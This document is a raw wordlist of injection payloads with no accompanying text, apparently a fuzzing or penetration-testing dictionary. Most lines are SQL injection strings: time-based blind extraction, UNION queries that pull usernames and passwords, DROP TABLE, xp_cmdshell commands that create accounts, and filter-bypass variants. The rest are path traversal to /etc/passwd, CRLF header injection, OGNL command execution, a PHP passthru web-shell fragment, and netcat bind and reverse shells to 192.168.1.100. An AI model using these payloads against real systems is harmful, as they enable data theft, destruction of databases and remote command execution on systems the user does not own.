+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
-1' or 85 = '83
1 AND SLEEP(5)
1'%20or%20'1'='1
1'%20or%20'1'='2
("'));", '"));', "));", "');", '");', ");","';", '";',";");
%20report:'%2bbenchmark(20000000%2csha1(1))%2b'
2'%20and%20benchmark(20000000%2csha1(1))--%20
' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 
' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2
-1' UNION SELECT version(),user() -- 
../../../etc/passwd%00;
IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%
&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMAR(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/
1%27%3bselect%20pg_sleep%282%29%3b%20--%20
db.exec("SELECT '\\\\' x");
1'or'1'='1
'and '0having'='0having'
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' 
%20report:'%2bbenchmark(20000000%2csha1(1))%2b'
2'%20and%20benchmark(20000000%2csha1(1))--%20
1+1%27'--&name=1
=5-1
4 OR 1=1 
Bo’%2b’ok
Bo’ || ’ok 
Book’ OR ‘x’=’x
SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL-- 
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –- 
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –- 
11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- 
11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –- 
11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –- 
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
UNION ALL SELECT 1,'x'/*,10 ;
EXEC sp_configure 'xp_cmdshell',1 
WHERE users NOT IN ('First User', 'Second User') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- 
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int 
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21 
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- 
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103-- 
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103-- 
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89-- 
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80-- 
SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
/*!32302 10*/
SELECT /*!32302 1/0, */ 1 FROM tablename 
10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--
SELECT IF(1=1,'true','false')
IF (1=1) SELECT 'true' ELSE SELECT 'false'
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0
SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45 
+SELECT login + '-' + password FROM members 
|| (*MO) SELECT login || '-' || password FROM members
CONCAT(login, password) FROM members
SELECT 0x457578 
SELECT CONCAT('0x',HEX('c:\\boot.ini')) 
' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin' --
admin' #
admin'/*
' HAVING 1=1 --
ORDER BY 1--
ORDER BY 2--
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- 
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
SELECT /*!32302 1/0, */ 1 FROM tablename 
10; DROP TABLE members -- 
10; DROP TABLE members /* 
SELECT /*!32302 1/0, */ 1 FROM tablename
/*! MYSQL Special SQL */ 
SELECT/*avoid-spaces*/password/**/FROM/**/Members 
DR/**/OP/*bypass blacklisting*/sampletable
DROP/*comment*/sampletable
admin'--
DROP sampletable;-- 
DROP sampletable;#
' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 
"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2"
' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2
1' UNION SELECT version(),user() -- 
-1' UNION SELECT version(),user() -- 
"-1' UNION SELECT version(),user() -- 
="-1' UNION SELECT version(),user() -- 
../../../etc/passwd%00;
cmd=ls -la; id; pwd;
?cmd=ls -la; id; pwd;
'; } passthru($_GET['cmd']); /*
1%20%20UNION%20SELECT%201,2,3,4,5,6,version%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,1,22,23,24,25,26,27,28,29,30,31,32%20--%20&
1 AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1
&& rm -f /tmp/x;;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc -l -vv -p 8080 > /tmp/x #' />
../../../etc/passwd
../../../../../etc/passwd
1%20%20UNION%20SELECT%201,2,3,4,5,6,version%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,1,22,23,24,25,26,27,28,29,30,31,32%20--%20&
=-1' or 85 = '83
-1' or 85 = '83
AND SLEEP(5)
%20AND SLEEP(5)
1%20%20UNION%20SELECT%201,2,3,4,5,6,version%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,1,22,23,24,25,26,27,28,29,30,31,32%20--%20
&#039;ssi&#039; 
".////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/passwd
%3b2fbin%2fbash%20ping%20www.wp.pl'
%3b%2fbin%2fnc%20-c%20%2fbin%2fbash%20192.168.1.100%204444'
;/bin/bash ping www.wp.pl -----/
;/bin/nc -c /bin/bash 192.168.1.100 4444 -----/
'1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#
1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#">
-1337+union+select+1,2,3,concat_ws(0x3a3a,id,username,password),5,6,7,8,
-1337+union+select+9,10,11,12,13,14,15,16,17,18,19+from+adlogin+limit+0,
-1337+union+select+1--
msgbox("foo");window.alert('bar');
?method=msgbox("foo");window.alert('bar');
?method=%00kybeci
%00kybeci
%1b%5d%32%3b%6f%77%6e%65%64%07%0a
%20%7C%7C%20ping%20-n%205%20127.0.0.1%20%26]
%20;%20x%20%7C%7C%20sleep%203%20%26
a%27+union+select+0,%27scrutinizer_statusfilter_sqli.nasl%27+--+
a'+union+select+0,'scrutinizer_statusfilter_sqli.nasl'+--+
%27+convert(int,convert(varchar,0x7b5d))+%27
%2527+convert(int,convert(varchar,0x7b5d))+%2527
'+convert(int,convert(varchar,0x7b5d))+'
&tool=1&interface=&host=127.0.0.1-c 1;cat /etc/passwd&pingipfqdn=127.0.0.1&size=&tracerouteipfqdn=&namelookupipfqdn=&dns=&routelookupipfqdn=&pinginterface=&tracerouteinterface=&selectdns=10.0.0.5&' -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah" http://<webserver>/corporate/Controller
\x1b]2;owned?\x07\x0a\x0d\x0a\x0d
?\x07\x0a\x0d\x0a\x0d
%1b%5d%32%3b%6f%77%6e%65%64%07%0a
%20and%20sleep(10)%20and%20%22%22%3D%22
%22%20and%20sleep(10)%20and%20%22%22%3D%22
16%22%20and%20sleep(10)%20and%20%22%22%3D%22
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini 
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini 
redirect:x%0ASet-Cookie:x%3D123
redirect:x%0DSet-Cookie:x%3D123
redirect:x%0D%0A+Set-Cookie:x%3D123
?redirect:x%0ASet-Cookie:x%3D123
?redirect:x%0DSet-Cookie:x%3D123
?redirect:x%0D%0A+Set-Cookie:x%3D123
?redirectAction:http://www.google.com/%23
redirectAction:http://www.google.com/%23
?redirect:http://www.google.com/
?action:%25{3*4}
action:%25{3*4}
?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'alert(xss)'})).start()}
?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'prompt(xss)'})).start()}
/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./c:$/
/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./c:/
%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23
DESC limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23
%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
ResourceName=../../../../../../../../../../../../../../../../etc/passwd
%20UNION%20SELECT%201,2,username,password,5,6,7,8,9,10,111,12,13,14,15,16,17,18%20FROM%20users%20--%20
|+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-
) UNION SELECT 1,2,3,4,username,6,7,8,9,password FROM users -- &
+UNION SELECT 1,2,3,4,username,6,7,8,9,password FROM users -- &
'union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-
-union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-
+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-
-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-
+1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-
'-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-
'1+1%27[SQL-Injection!]%27--&
ExtractValue(1,CONCAT(0x5c,(SELECT username FROM go_users LIMIT 1)))
id`,ExtractValue(1,CONCAT(0x5c,(SELECT username FROM go_users LIMIT 1)))#
1 or 1 = 1
1 and 1 = 1
1 || 1 = 1
1 && 1 = 1
1 || (select user from users where user_id = 1) = 'admin'
1 || (select user from users limit 1) = 'admin'
1 || (select user from users group by user_id having user_id = 1) = 'admin'
1 || (select user from users group by user_id having user_id = 1) = 'admin'
1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
1 || substr(user,1,1) = 'a'
1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
1 || user_id is not null
1 || substr(user,1,1) = 0x61
1 || substr(user,1,1) = unhex(61)
1 || substr(user,1,1) = unhex(61)
1 || substr(user,1,1) = lower(conv(11,10,36))
1 || substr(user,1,1) = lower(conv(11,10,36))
1 || lpad(user,7,1)
1 || lpad(user,7,1)
1%0b||%0blpad(user,7,1)
1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
1 union select 1, table_name from information_schema.tables where table_name = 'users'
1+un/**/ion+se/**/lect+1,2,3--
1+UnIoN/**/SeLecT/**/1,2,3--
1+UNunionION+SEselectLECT+1,2,3--
1+uni%0bon+se%0blect+1,2,3--
/1/**/||/**/lpad(first_name,7,1).html
1%0b||%0blpad(first_name,7,1).html
1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
?%2f**%2funion%2f**%2fselect
?/%2A%2A/union/%2A%2A/select
?/**/union/**/select..
=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*/bar
select#foo
1,2,current_user
1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
1/*!UnIoN*/SeLecT+1,2,3--
/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
select name,password from users
select name&q=password from users
select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
select/*,*/name,password/*,*/from/*,*/users
1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user lucifer UrWaFisShiT /*&id=1*/ --
1; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ net user zeq3ul UrWaFisShiT /*,1*/ --
1; EXEC master..xp_cmdshell net user zeq3ul UrWaFisShiT --
?xp[cmdshell
10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
SELECT /*!32302 1/0, */ 1 FROM tablename
SELECT IF(1=1,'true','false')
IF (1=1) SELECT 'true' ELSE SELECT 'false'
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S) 
SELECT login || '-' || password FROM members
SELECT login + '-' + password FROM members 
SELECT CONCAT('0x',HEX('c:\\boot.ini')) 
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) 
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) 
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:' 
EXEC master.dbo.xp_cmdshell 'ping '
SELECT 1,'x'/*,10 ;
EXEC sp_configure 'xp_cmdshell',1 
EXEC sp_configure 'show advanced options',1 
SELECT name FROM sysobjects WHERE xtype = 'U'
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
if (select user) = 'sa' waitfor delay '0:0:10'
1;waitfor delay '0:0:10'--
1);waitfor delay '0:0:10'--
1';waitfor delay '0:0:10'--
1');waitfor delay '0:0:10'--
1));waitfor delay '0:0:10'--
1'));waitfor delay '0:0:10'--
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1)) 
IF (SELECT * FROM login) c
SELECT pg_sleep(10); 
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select benchmark( 500000, sha1( 'test' ) );
select benchmark( 500000, sha1( 'admin' ) );
select benchmark( 500000, sha1( 'root' ) );
1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); 
select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
select bitand(6, 1) from systables where tabid = 1;
select bitand(6, 2) from systables where tabid = 1;
SELECT is_srvrolemember(‘sysadmin’);
SELECT is_srvrolemember(‘dbcreator’);
SELECT is_srvrolemember(‘bulkadmin’);
SELECT is_srvrolemember(‘diskadmin’);
SELECT is_srvrolemember(‘processadmin’);
SELECT is_srvrolemember(‘serveradmin’);
SELECT is_srvrolemember(‘setupadmin’);
SELECT is_srvrolemember(‘securityadmin’);
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables
10_'&&BeNChMaRK(2999999,mD5(NOW()))&&'1 
10_'&BeNChMaRK(2999999,mD5(NOW()))&&'1 
1; WAITFOR DELAY '00:00:10'-- (+10 seconds)  
x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- 
1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- 
1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) 
1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'-- 
1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'-- 
1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) 
1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) 
1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'-- 
1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'-- 
1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)	   
1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)	
1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds) 	   
1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),1,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),2,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),3,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),4,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),5,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),6,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)	   
1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),1,1)))=99) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=116) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),6,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),7,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),8,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),9,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds) 
